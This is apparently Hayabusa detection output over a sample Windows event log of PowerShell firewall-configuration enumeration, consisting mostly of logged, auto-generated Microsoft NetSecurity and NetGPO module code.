Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetGPO ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = 